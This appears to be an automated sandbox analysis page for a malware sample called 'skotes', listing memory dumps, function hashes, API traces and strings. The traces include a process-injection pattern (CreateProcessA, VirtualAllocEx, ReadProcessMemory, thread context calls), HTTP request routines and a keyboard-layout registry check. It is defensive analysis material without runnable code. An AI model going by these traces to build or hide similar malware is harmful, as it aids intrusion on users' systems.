Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$invalid stoi argument$stoi argument out of range
API String ID: 2167506142-885246636
Opcode ID: acd5eb268b11e2a443a3c211f60767c6acf695f284287b68903732b0561f4429
Instruction ID: 59e8f98912d433e589b28a24296d54b4be112dd54e090c58de4b907b0df8d0ec
Opcode Fuzzy Hash: acd5eb268b11e2a443a3c211f60767c6acf695f284287b68903732b0561f4429
Instruction Fuzzy Hash: C9B1C1B1A10118DBDB24CF28CC84BDE7A75EF45304F5042AEE909A72D1DB789AC4CB99

Function 004070A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 132
memoryprocessthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040712B
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00407144
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00407159
ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 00407179
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 004071BB
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00407291

Strings

VUUU, xrefs: 00406F41
invalid stoi argument, xrefs: 00407090
, xrefs: 00407170

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Virtual$AllocProcess$ContextCreateFreeMemoryReadThreadWow64
String ID: $VUUU$invalid stoi argument
API String ID: 752144545-3954507777
Opcode ID: 163c1efecc879c0f7b9555ea6eb2ef4c506ae6ab43fdb4304cb3b99373c542c0
Instruction ID: 056def1e07b86e2326a5b16f40d2480784debd9b24b262331673d8d05b380c9c
Opcode Fuzzy Hash: 163c1efecc879c0f7b9555ea6eb2ef4c506ae6ab43fdb4304cb3b99373c542c0
Instruction Fuzzy Hash: C241C370685301BFE660EB61CC02FAB77E9EF45B08F005529B684A71D0D7B4F9548BAA

Function 00406020 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 275
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 0040617D
RegEnumValueA.KERNEL32(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 00406271

Strings

0000043f, xrefs: 0040612B
00000422, xrefs: 004060C9
Keyboard Layout\Preload, xrefs: 00406054
00000419, xrefs: 00406098
00000423, xrefs: 004060FA

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: EnumOpenValue
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 2571532894-3963862150
Opcode ID: cdbcc395d39336cc31c214566b59639bf336001b614328b5ae92cb3fc7611b36
Instruction ID: dbc6e0ae7e183021992df71d102b10fdc28d5ba8ad8d5ed85468d51d81e5ff5b
Opcode Fuzzy Hash: cdbcc395d39336cc31c214566b59639bf336001b614328b5ae92cb3fc7611b36
Instruction Fuzzy Hash: 65B1C071900168ABDB24DB14CC84BDEB7B9AF05304F5402EAE509F72D1DB785BE88F58

Function 00407D30 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407ED3

Strings

JjsrQV==, xrefs: 00408092
JjssOl==, xrefs: 0040813A
JjsrPl==, xrefs: 0040828A
JjssPV==, xrefs: 004081E2

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
API String ID: 1721193555-3123340372
Opcode ID: 7de84809c6accab2c677c67f318d7ac30aa9f735c0bdd5d7c489fabfc65e4b89
Instruction ID: f6f9bceb7f2fe17a50aaf7873ce321754d30db823c9cb009d6fdb9dbbda7b7e7
Opcode Fuzzy Hash: 7de84809c6accab2c677c67f318d7ac30aa9f735c0bdd5d7c489fabfc65e4b89
Instruction Fuzzy Hash: 2CE13B70E00654A7DB14BB28CD0B39E7671AB82714F5442AEE805773C2EB7D4E858BCB

Function 00441ABC Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00441775: CreateFileW.KERNEL32(00000000,00000000,?,00441B65,?,?,00000000,?,00441B65,00000000,0000000C), ref: 00441792

__dosmaperr.LIBCMT ref: 00441BD7
GetFileType.KERNEL32(00000000), ref: 00441BE3
__dosmaperr.LIBCMT ref: 00441BF6
__dosmaperr.LIBCMT ref: 00441D9C

Strings

H, xrefs: 00441D21

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: __dosmaperr$File$CreateType
String ID: H
API String ID: 3443242726-2852464175
Opcode ID: 55458e0b7aa6ec69ae9e5e3308b3b6f86eaad0afea86b8da6a65b4fe266218e0
Instruction ID: 04932d91bddd30abc6db6b12c3a79094a363e5615997fb46c33dc5416ce0bc20
Opcode Fuzzy Hash: 55458e0b7aa6ec69ae9e5e3308b3b6f86eaad0afea86b8da6a65b4fe266218e0
Instruction Fuzzy Hash: 4BA13A72A041485FDF19DF68CC91BAE3BA1DB06324F14015EE851EF3A1E7389D52C75A

Function 00436FB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00436EE6), ref: 00436FD6
GetFileInformationByHandle.KERNEL32(?,?), ref: 00437030
__dosmaperr.LIBCMT ref: 004370C5

Part of subcall function 0043732A: __dosmaperr.LIBCMT ref: 0043735F

Strings

nC, xrefs: 00436FCE

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
